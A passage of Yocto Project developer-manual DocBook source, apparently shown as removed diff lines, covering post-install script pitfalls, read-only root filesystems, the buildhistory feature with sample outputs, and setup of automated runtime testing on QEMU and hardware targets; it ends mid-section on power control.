-
- <para>
- Here are some common problems that prevent
- post-installation scripts from running during root filesystem
- creation:
- <itemizedlist>
- <listitem><para>
- <emphasis>Not using $D in front of absolute
- paths:</emphasis>
- The build system defines
- <filename>$</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-D'><filename>D</filename></ulink>
- when the root filesystem is created.
- Furthermore, <filename>$D</filename> is blank when the
- script is run on the target device.
- This implies two purposes for <filename>$D</filename>:
- ensuring paths are valid in both the host and target
- environments, and checking to determine which
- environment is being used as a method for taking
- appropriate actions.
- </para></listitem>
- <listitem><para>
- <emphasis>Attempting to run processes that are
- specific to or dependent on the target
- architecture:</emphasis>
- You can work around these attempts by using native
- tools, which run on the host system,
- to accomplish the same tasks, or
- by alternatively running the processes under QEMU,
- which has the <filename>qemu_run_binary</filename>
- function.
- For more information, see the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-qemu'><filename>qemu</filename></ulink>
- class.</para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='areas-with-write-access'>
- <title>Areas With Write Access</title>
-
- <para>
- With the "read-only-rootfs" feature enabled,
- any attempt by the target to write to the root filesystem at
- runtime fails.
- Consequently, you must make sure that you configure processes
- and applications that attempt these types of writes do so
- to directories with write access (e.g.
- <filename>/tmp</filename> or <filename>/var/run</filename>).
- </para>
- </section>
- </section>
-
-
-
-
- <section id='maintaining-build-output-quality'>
- <title>Maintaining Build Output Quality</title>
-
- <para>
- Many factors can influence the quality of a build.
- For example, if you upgrade a recipe to use a new version of an
- upstream software package or you experiment with some new
- configuration options, subtle changes can occur that you might
- not detect until later.
- Consider the case where your recipe is using a newer version of
- an upstream package.
- In this case, a new version of a piece of software might
- introduce an optional dependency on another library, which is
- auto-detected.
- If that library has already been built when the software is
- building, the software will link to the built library and that
- library will be pulled into your image along with the new
- software even if you did not want the library.
- </para>
-
- <para>
- The
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-buildhistory'><filename>buildhistory</filename></ulink>
- class exists to help you maintain the quality of your build
- output.
- You can use the class to highlight unexpected and possibly
- unwanted changes in the build output.
- When you enable build history, it records information about the
- contents of each package and image and then commits that
- information to a local Git repository where you can examine
- the information.
- </para>
-
- <para>
- The remainder of this section describes the following:
- <itemizedlist>
- <listitem><para>
- How you can enable and disable build history
- </para></listitem>
- <listitem><para>
- How to understand what the build history contains
- </para></listitem>
- <listitem><para>
- How to limit the information used for build history
- </para></listitem>
- <listitem><para>
- How to examine the build history from both a
- command-line and web interface
- </para></listitem>
- </itemizedlist>
- </para>
-
- <section id='enabling-and-disabling-build-history'>
- <title>Enabling and Disabling Build History</title>
-
- <para>
- Build history is disabled by default.
- To enable it, add the following <filename>INHERIT</filename>
- statement and set the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-BUILDHISTORY_COMMIT'><filename>BUILDHISTORY_COMMIT</filename></ulink>
- variable to "1" at the end of your
- <filename>conf/local.conf</filename> file found in the
- <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>:
- <literallayout class='monospaced'>
- INHERIT += "buildhistory"
- BUILDHISTORY_COMMIT = "1"
- </literallayout>
- Enabling build history as previously described causes the
- OpenEmbedded build system to collect build output information
- and commit it as a single commit to a local
- <ulink url='&YOCTO_DOCS_OM_URL;#git'>Git</ulink>
- repository.
- <note>
- Enabling build history increases your build times slightly,
- particularly for images, and increases the amount of disk
- space used during the build.
- </note>
- </para>
-
- <para>
- You can disable build history by removing the previous
- statements from your <filename>conf/local.conf</filename>
- file.
- </para>
- </section>
-
- <section id='understanding-what-the-build-history-contains'>
- <title>Understanding What the Build History Contains</title>
-
- <para>
- Build history information is kept in
- <filename>${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-TOPDIR'><filename>TOPDIR</filename></ulink><filename>}/buildhistory</filename>
- in the Build Directory as defined by the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-BUILDHISTORY_DIR'><filename>BUILDHISTORY_DIR</filename></ulink>
- variable.
- The following is an example abbreviated listing:
- <imagedata fileref="figures/buildhistory.png" align="center" width="6in" depth="4in" />
- </para>
-
- <para>
- At the top level, a <filename>metadata-revs</filename>
- file exists that lists the revisions of the repositories for
- the enabled layers when the build was produced.
- The rest of the data splits into separate
- <filename>packages</filename>, <filename>images</filename>
- and <filename>sdk</filename> directories, the contents of
- which are described as follows.
- </para>
-
- <section id='build-history-package-information'>
- <title>Build History Package Information</title>
-
- <para>
- The history for each package contains a text file that has
- name-value pairs with information about the package.
- For example,
- <filename>buildhistory/packages/i586-poky-linux/busybox/busybox/latest</filename>
- contains the following:
- <literallayout class='monospaced'>
- PV = 1.22.1
- PR = r32
- RPROVIDES =
- RDEPENDS = glibc (>= 2.20) update-alternatives-opkg
- RRECOMMENDS = busybox-syslog busybox-udhcpc update-rc.d
- PKGSIZE = 540168
- FILES = /usr/bin/* /usr/sbin/* /usr/lib/busybox/* /usr/lib/lib*.so.* \
- /etc /com /var /bin/* /sbin/* /lib/*.so.* /lib/udev/rules.d \
- /usr/lib/udev/rules.d /usr/share/busybox /usr/lib/busybox/* \
- /usr/share/pixmaps /usr/share/applications /usr/share/idl \
- /usr/share/omf /usr/share/sounds /usr/lib/bonobo/servers
- FILELIST = /bin/busybox /bin/busybox.nosuid /bin/busybox.suid /bin/sh \
- /etc/busybox.links.nosuid /etc/busybox.links.suid
- </literallayout>
- Most of these name-value pairs correspond to variables
- used to produce the package.
- The exceptions are <filename>FILELIST</filename>, which
- is the actual list of files in the package, and
- <filename>PKGSIZE</filename>, which is the total size of
- files in the package in bytes.
- </para>
-
- <para>
- A file also exists that corresponds to the recipe from
- which the package came (e.g.
- <filename>buildhistory/packages/i586-poky-linux/busybox/latest</filename>):
- <literallayout class='monospaced'>
- PV = 1.22.1
- PR = r32
- DEPENDS = initscripts kern-tools-native update-rc.d-native \
- virtual/i586-poky-linux-compilerlibs virtual/i586-poky-linux-gcc \
- virtual/libc virtual/update-alternatives
- PACKAGES = busybox-ptest busybox-httpd busybox-udhcpd busybox-udhcpc \
- busybox-syslog busybox-mdev busybox-hwclock busybox-dbg \
- busybox-staticdev busybox-dev busybox-doc busybox-locale busybox
- </literallayout>
- </para>
-
- <para>
- Finally, for those recipes fetched from a version control
- system (e.g., Git), a file exists that lists source
- revisions that are specified in the recipe and lists
- the actual revisions used during the build.
- Listed and actual revisions might differ when
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SRCREV'><filename>SRCREV</filename></ulink>
- is set to
- ${<ulink url='&YOCTO_DOCS_REF_URL;#var-AUTOREV'><filename>AUTOREV</filename></ulink>}.
- Here is an example assuming
- <filename>buildhistory/packages/qemux86-poky-linux/linux-yocto/latest_srcrev</filename>):
- <literallayout class='monospaced'>
- # SRCREV_machine = "38cd560d5022ed2dbd1ab0dca9642e47c98a0aa1"
- SRCREV_machine = "38cd560d5022ed2dbd1ab0dca9642e47c98a0aa1"
- # SRCREV_meta = "a227f20eff056e511d504b2e490f3774ab260d6f"
- SRCREV_meta = "a227f20eff056e511d504b2e490f3774ab260d6f"
- </literallayout>
- You can use the
- <filename>buildhistory-collect-srcrevs</filename>
- command with the <filename>-a</filename> option to
- collect the stored <filename>SRCREV</filename> values
- from build history and report them in a format suitable for
- use in global configuration (e.g.,
- <filename>local.conf</filename> or a distro include file)
- to override floating <filename>AUTOREV</filename> values
- to a fixed set of revisions.
- Here is some example output from this command:
- <literallayout class='monospaced'>
- $ buildhistory-collect-srcrevs -a
- # i586-poky-linux
- SRCREV_pn-glibc = "b8079dd0d360648e4e8de48656c5c38972621072"
- SRCREV_pn-glibc-initial = "b8079dd0d360648e4e8de48656c5c38972621072"
- SRCREV_pn-opkg-utils = "53274f087565fd45d8452c5367997ba6a682a37a"
- SRCREV_pn-kmod = "fd56638aed3fe147015bfa10ed4a5f7491303cb4"
- # x86_64-linux
- SRCREV_pn-gtk-doc-stub-native = "1dea266593edb766d6d898c79451ef193eb17cfa"
- SRCREV_pn-dtc-native = "65cc4d2748a2c2e6f27f1cf39e07a5dbabd80ebf"
- SRCREV_pn-update-rc.d-native = "eca680ddf28d024954895f59a241a622dd575c11"
- SRCREV_glibc_pn-cross-localedef-native = "b8079dd0d360648e4e8de48656c5c38972621072"
- SRCREV_localedef_pn-cross-localedef-native = "c833367348d39dad7ba018990bfdaffaec8e9ed3"
- SRCREV_pn-prelink-native = "faa069deec99bf61418d0bab831c83d7c1b797ca"
- SRCREV_pn-opkg-utils-native = "53274f087565fd45d8452c5367997ba6a682a37a"
- SRCREV_pn-kern-tools-native = "23345b8846fe4bd167efdf1bd8a1224b2ba9a5ff"
- SRCREV_pn-kmod-native = "fd56638aed3fe147015bfa10ed4a5f7491303cb4"
- # qemux86-poky-linux
- SRCREV_machine_pn-linux-yocto = "38cd560d5022ed2dbd1ab0dca9642e47c98a0aa1"
- SRCREV_meta_pn-linux-yocto = "a227f20eff056e511d504b2e490f3774ab260d6f"
- # all-poky-linux
- SRCREV_pn-update-rc.d = "eca680ddf28d024954895f59a241a622dd575c11"
- </literallayout>
- <note>
- Here are some notes on using the
- <filename>buildhistory-collect-srcrevs</filename>
- command:
- <itemizedlist>
- <listitem><para>
- By default, only values where the
- <filename>SRCREV</filename> was not hardcoded
- (usually when <filename>AUTOREV</filename>
- is used) are reported.
- Use the <filename>-a</filename> option to
- see all <filename>SRCREV</filename> values.
- </para></listitem>
- <listitem><para>
- The output statements might not have any effect
- if overrides are applied elsewhere in the
- build system configuration.
- Use the <filename>-f</filename> option to add
- the <filename>forcevariable</filename> override
- to each output line if you need to work around
- this restriction.
- </para></listitem>
- <listitem><para>
- The script does apply special handling when
- building for multiple machines.
- However, the script does place a comment before
- each set of values that specifies which
- triplet to which they belong as previously
- shown (e.g.,
- <filename>i586-poky-linux</filename>).
- </para></listitem>
- </itemizedlist>
- </note>
- </para>
- </section>
-
- <section id='build-history-image-information'>
- <title>Build History Image Information</title>
-
- <para>
- The files produced for each image are as follows:
- <itemizedlist>
- <listitem><para>
- <filename>image-files:</filename>
- A directory containing selected files from the root
- filesystem.
- The files are defined by
- <ulink url='&YOCTO_DOCS_REF_URL;#var-BUILDHISTORY_IMAGE_FILES'><filename>BUILDHISTORY_IMAGE_FILES</filename></ulink>.
- </para></listitem>
- <listitem><para>
- <filename>build-id.txt:</filename>
- Human-readable information about the build
- configuration and metadata source revisions.
- This file contains the full build header as printed
- by BitBake.
- </para></listitem>
- <listitem><para>
- <filename>*.dot:</filename>
- Dependency graphs for the image that are
- compatible with <filename>graphviz</filename>.
- </para></listitem>
- <listitem><para>
- <filename>files-in-image.txt:</filename>
- A list of files in the image with permissions,
- owner, group, size, and symlink information.
- </para></listitem>
- <listitem><para>
- <filename>image-info.txt:</filename>
- A text file containing name-value pairs with
- information about the image.
- See the following listing example for more
- information.
- </para></listitem>
- <listitem><para>
- <filename>installed-package-names.txt:</filename>
- A list of installed packages by name only.
- </para></listitem>
- <listitem><para>
- <filename>installed-package-sizes.txt:</filename>
- A list of installed packages ordered by size.
- </para></listitem>
- <listitem><para>
- <filename>installed-packages.txt:</filename>
- A list of installed packages with full package
- filenames.
- </para></listitem>
- </itemizedlist>
- <note>
- Installed package information is able to be gathered
- and produced even if package management is disabled
- for the final image.
- </note>
- </para>
-
- <para>
- Here is an example of <filename>image-info.txt</filename>:
- <literallayout class='monospaced'>
- DISTRO = poky
- DISTRO_VERSION = 1.7
- USER_CLASSES = buildstats image-mklibs image-prelink
- IMAGE_CLASSES = image_types
- IMAGE_FEATURES = debug-tweaks
- IMAGE_LINGUAS =
- IMAGE_INSTALL = packagegroup-core-boot run-postinsts
- BAD_RECOMMENDATIONS =
- NO_RECOMMENDATIONS =
- PACKAGE_EXCLUDE =
- ROOTFS_POSTPROCESS_COMMAND = write_package_manifest; license_create_manifest; \
- write_image_manifest ; buildhistory_list_installed_image ; \
- buildhistory_get_image_installed ; ssh_allow_empty_password; \
- postinst_enable_logging; rootfs_update_timestamp ; ssh_disable_dns_lookup ;
- IMAGE_POSTPROCESS_COMMAND = buildhistory_get_imageinfo ;
- IMAGESIZE = 6900
- </literallayout>
- Other than <filename>IMAGESIZE</filename>, which is the
- total size of the files in the image in Kbytes, the
- name-value pairs are variables that may have influenced the
- content of the image.
- This information is often useful when you are trying to
- determine why a change in the package or file
- listings has occurred.
- </para>
- </section>
-
- <section id='using-build-history-to-gather-image-information-only'>
- <title>Using Build History to Gather Image Information Only</title>
-
- <para>
- As you can see, build history produces image information,
- including dependency graphs, so you can see why something
- was pulled into the image.
- If you are just interested in this information and not
- interested in collecting specific package or SDK
- information, you can enable writing only image information
- without any history by adding the following to your
- <filename>conf/local.conf</filename> file found in the
- <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>:
- <literallayout class='monospaced'>
- INHERIT += "buildhistory"
- BUILDHISTORY_COMMIT = "0"
- BUILDHISTORY_FEATURES = "image"
- </literallayout>
- Here, you set the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-BUILDHISTORY_FEATURES'><filename>BUILDHISTORY_FEATURES</filename></ulink>
- variable to use the image feature only.
- </para>
- </section>
-
- <section id='build-history-sdk-information'>
- <title>Build History SDK Information</title>
-
- <para>
- Build history collects similar information on the contents
- of SDKs
- (e.g. <filename>bitbake -c populate_sdk imagename</filename>)
- as compared to information it collects for images.
- Furthermore, this information differs depending on whether
- an extensible or standard SDK is being produced.
- </para>
-
- <para>
- The following list shows the files produced for SDKs:
- <itemizedlist>
- <listitem><para>
- <filename>files-in-sdk.txt:</filename>
- A list of files in the SDK with permissions,
- owner, group, size, and symlink information.
- This list includes both the host and target parts
- of the SDK.
- </para></listitem>
- <listitem><para>
- <filename>sdk-info.txt:</filename>
- A text file containing name-value pairs with
- information about the SDK.
- See the following listing example for more
- information.
- </para></listitem>
- <listitem><para>
- <filename>sstate-task-sizes.txt:</filename>
- A text file containing name-value pairs with
- information about task group sizes
- (e.g. <filename>do_populate_sysroot</filename>
- tasks have a total size).
- The <filename>sstate-task-sizes.txt</filename> file
- exists only when an extensible SDK is created.
- </para></listitem>
- <listitem><para>
- <filename>sstate-package-sizes.txt:</filename>
- A text file containing name-value pairs with
- information for the shared-state packages and
- sizes in the SDK.
- The <filename>sstate-package-sizes.txt</filename>
- file exists only when an extensible SDK is created.
- </para></listitem>
- <listitem><para>
- <filename>sdk-files:</filename>
- A folder that contains copies of the files
- mentioned in
- <filename>BUILDHISTORY_SDK_FILES</filename> if the
- files are present in the output.
- Additionally, the default value of
- <filename>BUILDHISTORY_SDK_FILES</filename> is
- specific to the extensible SDK although you can
- set it differently if you would like to pull in
- specific files from the standard SDK.</para>
-
- <para>The default files are
- <filename>conf/local.conf</filename>,
- <filename>conf/bblayers.conf</filename>,
- <filename>conf/auto.conf</filename>,
- <filename>conf/locked-sigs.inc</filename>, and
- <filename>conf/devtool.conf</filename>.
- Thus, for an extensible SDK, these files get
- copied into the <filename>sdk-files</filename>
- directory.
- </para></listitem>
- <listitem><para>
- The following information appears under
- each of the <filename>host</filename>
- and <filename>target</filename> directories
- for the portions of the SDK that run on the host
- and on the target, respectively:
- <note>
- The following files for the most part are empty
- when producing an extensible SDK because this
- type of SDK is not constructed from packages
- as is the standard SDK.
- </note>
- <itemizedlist>
- <listitem><para>
- <filename>depends.dot:</filename>
- Dependency graph for the SDK that is
- compatible with
- <filename>graphviz</filename>.
- </para></listitem>
- <listitem><para>
- <filename>installed-package-names.txt:</filename>
- A list of installed packages by name only.
- </para></listitem>
- <listitem><para>
- <filename>installed-package-sizes.txt:</filename>
- A list of installed packages ordered by size.
- </para></listitem>
- <listitem><para>
- <filename>installed-packages.txt:</filename>
- A list of installed packages with full
- package filenames.
- </para></listitem>
- </itemizedlist>
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- Here is an example of <filename>sdk-info.txt</filename>:
- <literallayout class='monospaced'>
- DISTRO = poky
- DISTRO_VERSION = 1.3+snapshot-20130327
- SDK_NAME = poky-glibc-i686-arm
- SDK_VERSION = 1.3+snapshot
- SDKMACHINE =
- SDKIMAGE_FEATURES = dev-pkgs dbg-pkgs
- BAD_RECOMMENDATIONS =
- SDKSIZE = 352712
- </literallayout>
- Other than <filename>SDKSIZE</filename>, which is the
- total size of the files in the SDK in Kbytes, the
- name-value pairs are variables that might have influenced
- the content of the SDK.
- This information is often useful when you are trying to
- determine why a change in the package or file listings
- has occurred.
- </para>
- </section>
-
- <section id='examining-build-history-information'>
- <title>Examining Build History Information</title>
-
- <para>
- You can examine build history output from the command
- line or from a web interface.
- </para>
-
- <para>
- To see any changes that have occurred (assuming you have
- <ulink url='&YOCTO_DOCS_REF_URL;#var-BUILDHISTORY_COMMIT'><filename>BUILDHISTORY_COMMIT</filename></ulink><filename>&nbsp;= "1"</filename>),
- you can simply use any Git command that allows you to
- view the history of a repository.
- Here is one method:
- <literallayout class='monospaced'>
- $ git log -p
- </literallayout>
- You need to realize, however, that this method does show
- changes that are not significant (e.g. a package's size
- changing by a few bytes).
- </para>
-
- <para>
- A command-line tool called
- <filename>buildhistory-diff</filename> does exist, though,
- that queries the Git repository and prints just the
- differences that might be significant in human-readable
- form.
- Here is an example:
- <literallayout class='monospaced'>
- $ ~/poky/poky/scripts/buildhistory-diff . HEAD^
- Changes to images/qemux86_64/glibc/core-image-minimal (files-in-image.txt):
- /etc/anotherpkg.conf was added
- /sbin/anotherpkg was added
- * (installed-package-names.txt):
- * anotherpkg was added
- Changes to images/qemux86_64/glibc/core-image-minimal (installed-package-names.txt):
- anotherpkg was added
- packages/qemux86_64-poky-linux/v86d: PACKAGES: added "v86d-extras"
- * PR changed from "r0" to "r1"
- * PV changed from "0.1.10" to "0.1.12"
- packages/qemux86_64-poky-linux/v86d/v86d: PKGSIZE changed from 110579 to 144381 (+30%)
- * PR changed from "r0" to "r1"
- * PV changed from "0.1.10" to "0.1.12"
- </literallayout>
- <note>
- The <filename>buildhistory-diff</filename> tool
- requires the <filename>GitPython</filename> package.
- Be sure to install it using Pip3 as follows:
- <literallayout class='monospaced'>
- $ pip3 install GitPython --user
- </literallayout>
- Alternatively, you can install
- <filename>python3-git</filename> using the appropriate
- distribution package manager (e.g.
- <filename>apt-get</filename>, <filename>dnf</filename>,
- or <filename>zipper</filename>).
- </note>
- </para>
-
- <para>
- To see changes to the build history using a web interface,
- follow the instruction in the <filename>README</filename>
- file here.
- <ulink url='http://git.yoctoproject.org/cgit/cgit.cgi/buildhistory-web/'></ulink>.
- </para>
-
- <para>
- Here is a sample screenshot of the interface:
- <imagedata fileref="figures/buildhistory-web.png" align="center" scalefit="1" width="130%" contentdepth="130%" />
- </para>
- </section>
- </section>
- </section>
-
- <section id="performing-automated-runtime-testing">
- <title>Performing Automated Runtime Testing</title>
-
- <para>
- The OpenEmbedded build system makes available a series of automated
- tests for images to verify runtime functionality.
- You can run these tests on either QEMU or actual target hardware.
- Tests are written in Python making use of the
- <filename>unittest</filename> module, and the majority of them
- run commands on the target system over SSH.
- This section describes how you set up the environment to use these
- tests, run available tests, and write and add your own tests.
- </para>
-
- <para>
- For information on the test and QA infrastructure available
- within the Yocto Project, see the
- "<ulink url='&YOCTO_DOCS_REF_URL;#testing-and-quality-assurance'>Testing and Quality Assurance</ulink>"
- section in the Yocto Project Reference Manual.
- </para>
-
- <section id='enabling-tests'>
- <title>Enabling Tests</title>
-
- <para>
- Depending on whether you are planning to run tests using
- QEMU or on the hardware, you have to take
- different steps to enable the tests.
- See the following subsections for information on how to
- enable both types of tests.
- </para>
-
- <section id='qemu-image-enabling-tests'>
- <title>Enabling Runtime Tests on QEMU</title>
-
- <para>
- In order to run tests, you need to do the following:
- <itemizedlist>
- <listitem><para><emphasis>Set up to avoid interaction
- with <filename>sudo</filename> for networking:</emphasis>
- To accomplish this, you must do one of the
- following:
- <itemizedlist>
- <listitem><para>Add
- <filename>NOPASSWD</filename> for your user
- in <filename>/etc/sudoers</filename> either for
- all commands or just for
- <filename>runqemu-ifup</filename>.
- You must provide the full path as that can
- change if you are using multiple clones of the
- source repository.
- <note>
- On some distributions, you also need to
- comment out "Defaults requiretty" in
- <filename>/etc/sudoers</filename>.
- </note></para></listitem>
- <listitem><para>Manually configure a tap interface
- for your system.</para></listitem>
- <listitem><para>Run as root the script in
- <filename>scripts/runqemu-gen-tapdevs</filename>,
- which should generate a list of tap devices.
- This is the option typically chosen for
- Autobuilder-type environments.
- <note><title>Notes</title>
- <itemizedlist>
- <listitem><para>
- Be sure to use an absolute path
- when calling this script
- with sudo.
- </para></listitem>
- <listitem><para>
- The package recipe
- <filename>qemu-helper-native</filename>
- is required to run this script.
- Build the package using the
- following command:
- <literallayout class='monospaced'>
- $ bitbake qemu-helper-native
- </literallayout>
- </para></listitem>
- </itemizedlist>
- </note>
- </para></listitem>
- </itemizedlist></para></listitem>
- <listitem><para><emphasis>Set the
- <filename>DISPLAY</filename> variable:</emphasis>
- You need to set this variable so that you have an X
- server available (e.g. start
- <filename>vncserver</filename> for a headless machine).
- </para></listitem>
- <listitem><para><emphasis>Be sure your host's firewall
- accepts incoming connections from
- 192.168.7.0/24:</emphasis>
- Some of the tests (in particular DNF tests) start
- an HTTP server on a random high number port,
- which is used to serve files to the target.
- The DNF module serves
- <filename>${WORKDIR}/oe-rootfs-repo</filename>
- so it can run DNF channel commands.
- That means your host's firewall
- must accept incoming connections from 192.168.7.0/24,
- which is the default IP range used for tap devices
- by <filename>runqemu</filename>.</para></listitem>
- <listitem><para><emphasis>Be sure your host has the
- correct packages installed:</emphasis>
- Depending your host's distribution, you need
- to have the following packages installed:
- <itemizedlist>
- <listitem><para>Ubuntu and Debian:
- <filename>sysstat</filename> and
- <filename>iproute2</filename>
- </para></listitem>
- <listitem><para>OpenSUSE:
- <filename>sysstat</filename> and
- <filename>iproute2</filename>
- </para></listitem>
- <listitem><para>Fedora:
- <filename>sysstat</filename> and
- <filename>iproute</filename>
- </para></listitem>
- <listitem><para>CentOS:
- <filename>sysstat</filename> and
- <filename>iproute</filename>
- </para></listitem>
- </itemizedlist>
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- Once you start running the tests, the following happens:
- <orderedlist>
- <listitem><para>A copy of the root filesystem is written
- to <filename>${WORKDIR}/testimage</filename>.
- </para></listitem>
- <listitem><para>The image is booted under QEMU using the
- standard <filename>runqemu</filename> script.
- </para></listitem>
- <listitem><para>A default timeout of 500 seconds occurs
- to allow for the boot process to reach the login prompt.
- You can change the timeout period by setting
- <ulink url='&YOCTO_DOCS_REF_URL;#var-TEST_QEMUBOOT_TIMEOUT'><filename>TEST_QEMUBOOT_TIMEOUT</filename></ulink>
- in the <filename>local.conf</filename> file.
- </para></listitem>
- <listitem><para>Once the boot process is reached and the
- login prompt appears, the tests run.
- The full boot log is written to
- <filename>${WORKDIR}/testimage/qemu_boot_log</filename>.
- </para></listitem>
- <listitem><para>Each test module loads in the order found
- in <filename>TEST_SUITES</filename>.
- You can find the full output of the commands run over
- SSH in
- <filename>${WORKDIR}/testimgage/ssh_target_log</filename>.
- </para></listitem>
- <listitem><para>If no failures occur, the task running the
- tests ends successfully.
- You can find the output from the
- <filename>unittest</filename> in the task log at
- <filename>${WORKDIR}/temp/log.do_testimage</filename>.
- </para></listitem>
- </orderedlist>
- </para>
- </section>
-
- <section id='hardware-image-enabling-tests'>
- <title>Enabling Runtime Tests on Hardware</title>
-
- <para>
- The OpenEmbedded build system can run tests on real
- hardware, and for certain devices it can also deploy
- the image to be tested onto the device beforehand.
- </para>
-
- <para>
- For automated deployment, a "master image" is installed
- onto the hardware once as part of setup.
- Then, each time tests are to be run, the following
- occurs:
- <orderedlist>
- <listitem><para>The master image is booted into and
- used to write the image to be tested to
- a second partition.
- </para></listitem>
- <listitem><para>The device is then rebooted using an
- external script that you need to provide.
- </para></listitem>
- <listitem><para>The device boots into the image to be
- tested.
- </para></listitem>
- </orderedlist>
- </para>
-
- <para>
- When running tests (independent of whether the image
- has been deployed automatically or not), the device is
- expected to be connected to a network on a
- pre-determined IP address.
- You can either use static IP addresses written into
- the image, or set the image to use DHCP and have your
- DHCP server on the test network assign a known IP address
- based on the MAC address of the device.
- </para>
-
- <para>
- In order to run tests on hardware, you need to set
- <filename>TEST_TARGET</filename> to an appropriate value.
- For QEMU, you do not have to change anything, the default
- value is "qemu".
- For running tests on hardware, the following options exist:
- <itemizedlist>
- <listitem><para><emphasis>"simpleremote":</emphasis>
- Choose "simpleremote" if you are going to
- run tests on a target system that is already
- running the image to be tested and is available
- on the network.
- You can use "simpleremote" in conjunction
- with either real hardware or an image running
- within a separately started QEMU or any
- other virtual machine manager.
- </para></listitem>
- <listitem><para><emphasis>"SystemdbootTarget":</emphasis>
- Choose "SystemdbootTarget" if your hardware is
- an EFI-based machine with
- <filename>systemd-boot</filename> as bootloader and
- <filename>core-image-testmaster</filename>
- (or something similar) is installed.
- Also, your hardware under test must be in a
- DHCP-enabled network that gives it the same IP
- address for each reboot.</para>
- <para>If you choose "SystemdbootTarget", there are
- additional requirements and considerations.
- See the
- "<link linkend='selecting-systemdboottarget'>Selecting SystemdbootTarget</link>"
- section, which follows, for more information.
- </para></listitem>
- <listitem><para><emphasis>"BeagleBoneTarget":</emphasis>
- Choose "BeagleBoneTarget" if you are deploying
- images and running tests on the BeagleBone
- "Black" or original "White" hardware.
- For information on how to use these tests, see the
- comments at the top of the BeagleBoneTarget
- <filename>meta-yocto-bsp/lib/oeqa/controllers/beaglebonetarget.py</filename>
- file.
- </para></listitem>
- <listitem><para><emphasis>"EdgeRouterTarget":</emphasis>
- Choose "EdgeRouterTarget" is you are deploying
- images and running tests on the Ubiquiti Networks
- EdgeRouter Lite.
- For information on how to use these tests, see the
- comments at the top of the EdgeRouterTarget
- <filename>meta-yocto-bsp/lib/oeqa/controllers/edgeroutertarget.py</filename>
- file.
- </para></listitem>
- <listitem><para><emphasis>"GrubTarget":</emphasis>
- Choose the "supports deploying images and running
- tests on any generic PC that boots using GRUB.
- For information on how to use these tests, see the
- comments at the top of the GrubTarget
- <filename>meta-yocto-bsp/lib/oeqa/controllers/grubtarget.py</filename>
- file.
- </para></listitem>
- <listitem><para><emphasis>"<replaceable>your-target</replaceable>":</emphasis>
- Create your own custom target if you want to run
- tests when you are deploying images and running
- tests on a custom machine within your BSP layer.
- To do this, you need to add a Python unit that
- defines the target class under
- <filename>lib/oeqa/controllers/</filename> within
- your layer.
- You must also provide an empty
- <filename>__init__.py</filename>.
- For examples, see files in
- <filename>meta-yocto-bsp/lib/oeqa/controllers/</filename>.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='selecting-systemdboottarget'>
- <title>Selecting SystemdbootTarget</title>
-
- <para>
- If you did not set <filename>TEST_TARGET</filename> to
- "SystemdbootTarget", then you do not need any information
- in this section.
- You can skip down to the
- "<link linkend='qemu-image-running-tests'>Running Tests</link>"
- section.
- </para>
-
- <para>
- If you did set <filename>TEST_TARGET</filename> to
- "SystemdbootTarget", you also need to perform a one-time
- setup of your master image by doing the following:
- <orderedlist>
- <listitem><para><emphasis>Set <filename>EFI_PROVIDER</filename>:</emphasis>
- Be sure that <filename>EFI_PROVIDER</filename>
- is as follows:
- <literallayout class='monospaced'>
- EFI_PROVIDER = "systemd-boot"
- </literallayout>
- </para></listitem>
- <listitem><para><emphasis>Build the master image:</emphasis>
- Build the <filename>core-image-testmaster</filename>
- image.
- The <filename>core-image-testmaster</filename>
- recipe is provided as an example for a
- "master" image and you can customize the image
- recipe as you would any other recipe.
- </para>
- <para>Here are the image recipe requirements:
- <itemizedlist>
- <listitem><para>Inherits
- <filename>core-image</filename>
- so that kernel modules are installed.
- </para></listitem>
- <listitem><para>Installs normal linux utilities
- not busybox ones (e.g.
- <filename>bash</filename>,
- <filename>coreutils</filename>,
- <filename>tar</filename>,
- <filename>gzip</filename>, and
- <filename>kmod</filename>).
- </para></listitem>
- <listitem><para>Uses a custom
- Initial RAM Disk (initramfs) image with a
- custom installer.
- A normal image that you can install usually
- creates a single rootfs partition.
- This image uses another installer that
- creates a specific partition layout.
- Not all Board Support Packages (BSPs)
- can use an installer.
- For such cases, you need to manually create
- the following partition layout on the
- target:
- <itemizedlist>
- <listitem><para>First partition mounted
- under <filename>/boot</filename>,
- labeled "boot".
- </para></listitem>
- <listitem><para>The main rootfs
- partition where this image gets
- installed, which is mounted under
- <filename>/</filename>.
- </para></listitem>
- <listitem><para>Another partition
- labeled "testrootfs" where test
- images get deployed.
- </para></listitem>
- </itemizedlist>
- </para></listitem>
- </itemizedlist>
- </para></listitem>
- <listitem><para><emphasis>Install image:</emphasis>
- Install the image that you just built on the target
- system.
- </para></listitem>
- </orderedlist>
- </para>
-
- <para>
- The final thing you need to do when setting
- <filename>TEST_TARGET</filename> to "SystemdbootTarget" is
- to set up the test image:
- <orderedlist>
- <listitem><para><emphasis>Set up your <filename>local.conf</filename> file:</emphasis>
- Make sure you have the following statements in
- your <filename>local.conf</filename> file:
- <literallayout class='monospaced'>
- IMAGE_FSTYPES += "tar.gz"
- INHERIT += "testimage"
- TEST_TARGET = "SystemdbootTarget"
- TEST_TARGET_IP = "192.168.2.3"
- </literallayout>
- </para></listitem>
- <listitem><para><emphasis>Build your test image:</emphasis>
- Use BitBake to build the image:
- <literallayout class='monospaced'>
- $ bitbake core-image-sato
- </literallayout>
- </para></listitem>
- </orderedlist>
- </para>
- </section>
-
- <section id='power-control'>
- <title>Power Control</title>
-
- <para>
- For most hardware targets other than "simpleremote",
- you can control power:
- <itemizedlist>
- <listitem><para>
- You can use
- <filename>TEST_POWERCONTROL_CMD</filename>
- together with
- <filename>TEST_POWERCONTROL_EXTRA_ARGS</filename>
- as a command that runs on the host and does power
- cycling.
- The test code passes one argument to that command:
- off, on or cycle (off then on).
